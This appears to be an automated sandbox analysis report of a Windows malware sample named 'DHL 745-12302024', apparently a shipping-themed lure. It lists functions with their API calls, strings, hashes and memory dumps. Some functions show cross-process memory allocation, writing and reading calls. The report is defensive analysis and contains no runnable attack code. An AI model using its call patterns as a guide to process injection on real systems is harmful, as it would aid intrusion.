API String ID: 3850602802-2594219639
Opcode ID: e2fda6c44d6e7e118da2218f86cf4b9b5a83faf2ce5aa351a7a08cb99243ab60
Instruction ID: 0a04e2d3796336748b4b4408dae216657e872a6de703737503e76c3352a12551
Opcode Fuzzy Hash: e2fda6c44d6e7e118da2218f86cf4b9b5a83faf2ce5aa351a7a08cb99243ab60
Instruction Fuzzy Hash: CE210572E00204ABCB11AF95C980FBFB7B9EF98710F01402DF915A7290EA749D42C7A0

Function 00AC3BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC3D03: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC3D18

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AC3C23
_strlen.LIBCMT ref: 00AC3C2E

Strings

@U=u, xrefs: 00AC3C23

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: fd7c18c9477dbcda18b18c1ace478d10a8598b00ec9e85a3813878d32e96231f
Instruction ID: 730b4fe779c6c3f3c12d97a226eec773dd32b153d3269a8cb730cc0c6480920a
Opcode Fuzzy Hash: fd7c18c9477dbcda18b18c1ace478d10a8598b00ec9e85a3813878d32e96231f
Instruction Fuzzy Hash: 04110A337081156BCF28BB79D992EBE77748F55B40F11803DF906AB292DE209E4687D4

Function 00AF336F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACED19: GetLocalTime.KERNEL32 ref: 00ACED2A
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACED3B
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACED79
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACEDAF
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACEDDF
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACEDEF
Part of subcall function 00ACED19: _wcslen.LIBCMT ref: 00ACEE2B

SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF340A

Strings

@U=u, xrefs: 00AF340A
SysDateTimePick32, xrefs: 00AF33C7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2216836867-2530228043
Opcode ID: 5c9a9570b6aa95abd97c9a92c66bc447ddf718809c9955f481dee401462e3c10
Instruction ID: 6da5dbaf685ba9bc3a8306a419040f9c200206f0705759eafdf9f217ab9f7cbe
Opcode Fuzzy Hash: 5c9a9570b6aa95abd97c9a92c66bc447ddf718809c9955f481dee401462e3c10
Instruction Fuzzy Hash: CA21B4323402196BEF22DF94DC81FFE73AAEB44764F204619FA51AB1D0DAB5EC518760

Function 00AC215F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2178

Part of subcall function 00ACB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00ACB355
Part of subcall function 00ACB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AC2194,00000034,?,?,00001004,00000000,00000000), ref: 00ACB365
Part of subcall function 00ACB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AC2194,00000034,?,?,00001004,00000000,00000000), ref: 00ACB37B

Part of subcall function 00ACB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21D0,?,?,00000034,00000800,?,00000034), ref: 00ACB42D

SendMessageW.USER32(?,00001073,00000000,?), ref: 00AC21DF

Part of subcall function 00ACB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00ACB3F8

Strings

@U=u, xrefs: 00AC2178, 00AC21DF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: 388019bc3620cc11b808f3a3d58c5a5fc6442211b9332657498d80ecc7fcc4ad
Instruction ID: c38c51cb5d94fbdb931c41a7094873338aa5c31175094a5b321d4cdb9dad3c37
Opcode Fuzzy Hash: 388019bc3620cc11b808f3a3d58c5a5fc6442211b9332657498d80ecc7fcc4ad
Instruction Fuzzy Hash: CB214131901129ABEF15EFA4DD41FDDBBB8FF08350F110199F558E7190EA715A44CB60

Function 00AF31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF3287

Strings

Combobox, xrefs: 00AF3249

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d642f752842b280d9d8419c12d390eb303dfc62765039c3871c721476c928c03
Instruction ID: fae30bf85b49278667005a99dc827b9eb373905fb399e5c41ac57d279a1f54c2
Opcode Fuzzy Hash: d642f752842b280d9d8419c12d390eb303dfc62765039c3871c721476c928c03
Instruction Fuzzy Hash: A011907220020C6FEF219F94DC80EFB376AEBA4364F104625FA1997290D6759D519760

Function 00AF3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A6600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A6604C
Part of subcall function 00A6600E: GetStockObject.GDI32(00000011), ref: 00A66060
Part of subcall function 00A6600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A6606A

GetWindowRect.USER32(00000000,?), ref: 00AF377A
GetSysColor.USER32(00000012), ref: 00AF3794

Strings

static, xrefs: 00AF3757

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ffebea0c20ea85fae3c9286a777cccf3940be9366613c74eefa4ccc16b5c5585
Instruction ID: 20a946b7f4db0c3800afdbad6fbed234598a95fdbc835d79e710e494ad94206c
Opcode Fuzzy Hash: ffebea0c20ea85fae3c9286a777cccf3940be9366613c74eefa4ccc16b5c5585
Instruction Fuzzy Hash: 481117B2610209AFDF00EFA8CD45AFA7BB8EB08354F004914FA56E2250D735E851DB50

Function 00AF6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AF61FC
SendMessageW.USER32(?,00000194,00000000,00000000), ref: 00AF6225

Strings

@U=u, xrefs: 00AF61FC, 00AF6225

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 3a68819585d121884e91a6a14e883d25f711e9e97febedddb9341ed8a159cda3
Instruction ID: ff249d9e3a6b2aad3408bdbd67c8d8644e15e68e51f7986c2dbba32bde59538b
Opcode Fuzzy Hash: 3a68819585d121884e91a6a14e883d25f711e9e97febedddb9341ed8a159cda3
Instruction Fuzzy Hash: DA11BF3194021CBEEB108FE8CD1AFFA3BA8EB0A310F004115FB16AA1E1D7B4DA00DB50

Function 00ADCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ADCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ADCDA6

Strings

<local>, xrefs: 00ADCD66

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 45c81cac7b409bf9e9402562921030ac4a7811f7dc0940322fb7482c699ee0ba
Instruction ID: 439b04c567b99505f2bb5c3bcbdf99413bb3e372f46f3c638d0006e0541cc8e9
Opcode Fuzzy Hash: 45c81cac7b409bf9e9402562921030ac4a7811f7dc0940322fb7482c699ee0ba
Instruction Fuzzy Hash: 3711A3712056367ED7285BA68C45EF7BEAAEF127B4F804227B18A83280D6649941D6F0

Function 00AF4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00AF4FCC

Strings

@U=u, xrefs: 00AF4FCC, 00AF5008

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ce058071f801000cfb35737dd792927728a03a508576d816ec6d12da70582609
Instruction ID: 50882f7954c504615e2967747550db1c91f19af857fe314c28c7b9079803bab2
Opcode Fuzzy Hash: ce058071f801000cfb35737dd792927728a03a508576d816ec6d12da70582609
Instruction Fuzzy Hash: 3021B376A1411EEFCB15DFA8C9508EA7BB9FB4D350B104554FA06A7310D731ED21DB90

Function 00AF30D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00AF3147

Strings

@U=u, xrefs: 00AF3147
button, xrefs: 00AF311E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: eb595c9508a95b68f2f46aa880df1bdf10b6b56bb1f807db88371eca37e9201a
Instruction ID: 787fa09c88dcf6c051e34b149316b918457a5f1fbf1dad741dda12138463b74c
Opcode Fuzzy Hash: eb595c9508a95b68f2f46aa880df1bdf10b6b56bb1f807db88371eca37e9201a
Instruction Fuzzy Hash: 8911A132150209ABDF119FA4DC41FFA3BAAEB08354F104614FB54A7190CB76E861A764

Function 00AC6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

CharUpperBuffW.USER32(?,?,?), ref: 00AC6CB6
_wcslen.LIBCMT ref: 00AC6CC2

Strings

STOP, xrefs: 00AC6CBC, 00AC6CC1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 1a041b2b9dce0a25ec79601da488cd2255919e57f1eb2a868823922f267dea09
Instruction ID: 9d231e631970f377eefe1e09cdddb3955b38329fc46ba9b69a6b9eff6ecbaf35
Opcode Fuzzy Hash: 1a041b2b9dce0a25ec79601da488cd2255919e57f1eb2a868823922f267dea09
Instruction Fuzzy Hash: E701C032A049268BCB21EFFDDD80EBF77B9EA65724B12052CE86297194EB31D900C650

Function 00AC23DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21D0,?,?,00000034,00000800,?,00000034), ref: 00ACB42D

SendMessageW.USER32(?,0000102B,?,00000000), ref: 00AC243B
SendMessageW.USER32(?,0000102B,?,00000000), ref: 00AC245E

Strings

@U=u, xrefs: 00AC243B, 00AC245E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: 882bbe19655b9db38c1260615f9f8ef2c5abafd69179856e7bf2fe25bfbc4db3
Instruction ID: e8ca1527961ddf4f6e467d693787baaf140e07ff943b3bdafae47a011eb668fc
Opcode Fuzzy Hash: 882bbe19655b9db38c1260615f9f8ef2c5abafd69179856e7bf2fe25bfbc4db3
Instruction Fuzzy Hash: D501F932900218EBEB15AFA4DD46FEEBB79DB14320F10402AF525A60D1EB745D45CB60

Function 00AF4366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 00AF43AF
InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 00AF4408

Strings

@U=u, xrefs: 00AF43AF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID: @U=u
API String ID: 909852535-2594219639
Opcode ID: 7321d5e48aa9987985412ff9627588e34cf5f856d04804c73feb740d63751398
Instruction ID: b22798bcb6c79fa3db4b2af3684adf0b3150230203a791566abe605871ca5830
Opcode Fuzzy Hash: 7321d5e48aa9987985412ff9627588e34cf5f856d04804c73feb740d63751398
Instruction Fuzzy Hash: 2E118F34500748AFE721CFA8C991BE7BBE5BF09310F10861DF9AB9B291D771A941DB50

Function 00AC250B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00AC2531
SendMessageW.USER32(?,0000040D,?,00000000), ref: 00AC2564

Part of subcall function 00ACB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00ACB3F8

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

Strings

@U=u, xrefs: 00AC2531, 00AC2564

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_wcslen
String ID: @U=u
API String ID: 1083363909-2594219639
Opcode ID: ada16f68dba85084588c84f56a1435d69d3fb1e93931556814d8ec601f25cb38
Instruction ID: e3fa83327be12815cd935c1fb9f8032139f5f8afd28dd6670abc861b18b3179a
Opcode Fuzzy Hash: ada16f68dba85084588c84f56a1435d69d3fb1e93931556814d8ec601f25cb38
Instruction Fuzzy Hash: F9016D71900118AFDB50EF90CD91EEE77BCEB14340F80D0A9F649A6150EE755E89CB90

Function 00AF90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00AB769C,?,?,?), ref: 00AF9111

Part of subcall function 00A79944: GetWindowLongW.USER32(?,000000EB), ref: 00A79952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00AF90F7

Strings

@U=u, xrefs: 00AF90F7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: 565ca3c66666462ab995268fecfd9cba293db1787ab15df59222b44a3d3246f3
Instruction ID: de5e171ba51b4b06d456b1102931401f54d315ef94003a89b2d02ddc7eb82caa
Opcode Fuzzy Hash: 565ca3c66666462ab995268fecfd9cba293db1787ab15df59222b44a3d3246f3
Instruction Fuzzy Hash: C701FC30100208ABDB209F98CD49FBB3BBAEF85364F104628FA150B2E1CB326846CB54

Function 00AC246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2480
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC2497

Part of subcall function 00AC23DB: SendMessageW.USER32(?,0000102B,?,00000000), ref: 00AC243B

Strings

@U=u, xrefs: 00AC2480, 00AC2497

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: fd1e5276ea15d5801574966580c64202129d195ec52892523502be074ca6d2ca
Instruction ID: e52419b9b58d4db75e44212c1c3af3813e9f441e524b9ebc6988807d0485e892
Opcode Fuzzy Hash: fd1e5276ea15d5801574966580c64202129d195ec52892523502be074ca6d2ca
Instruction Fuzzy Hash: 41F0E230601125BBEB205B96CE0AEEFBF6DDF46760B100018B405E6151C6A05D41C7A0

Function 00AE747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AE7493
_wcslen.LIBCMT ref: 00AE74B9

Strings

3, 3, 16, 1, xrefs: 00AE7483

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 80a801c5138368ef381d40e33929a4ce3578a3e3c88df9629da585b847759ca0
Instruction ID: e3ad2f4f410e173b9ddfd3ffc4125856c45644311a036f45fd6667a4ae016bb9
Opcode Fuzzy Hash: 80a801c5138368ef381d40e33929a4ce3578a3e3c88df9629da585b847759ca0
Instruction Fuzzy Hash: 37E0611231536110A331337BEDC197F66C9CFCD750710182BF989C22E6EB94CD9293A0

Function 00AC2BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AC2BFA
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00AC2C2A

Strings

@U=u, xrefs: 00AC2BFA, 00AC2C2A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 9e015d7381affd4dc2e410ca7397d25c3207984e1a77549e7b3ba81480d7d06a
Instruction ID: 9579b7f724b46786e12d1a300fb5098a4d28b7ad162fdcd4b51a25bd598e0a59
Opcode Fuzzy Hash: 9e015d7381affd4dc2e410ca7397d25c3207984e1a77549e7b3ba81480d7d06a
Instruction Fuzzy Hash: EDF0A075384308BFFA11AFC5DD86FFA3B58EB14761F004018F7099A0D0C9E25C0097A0

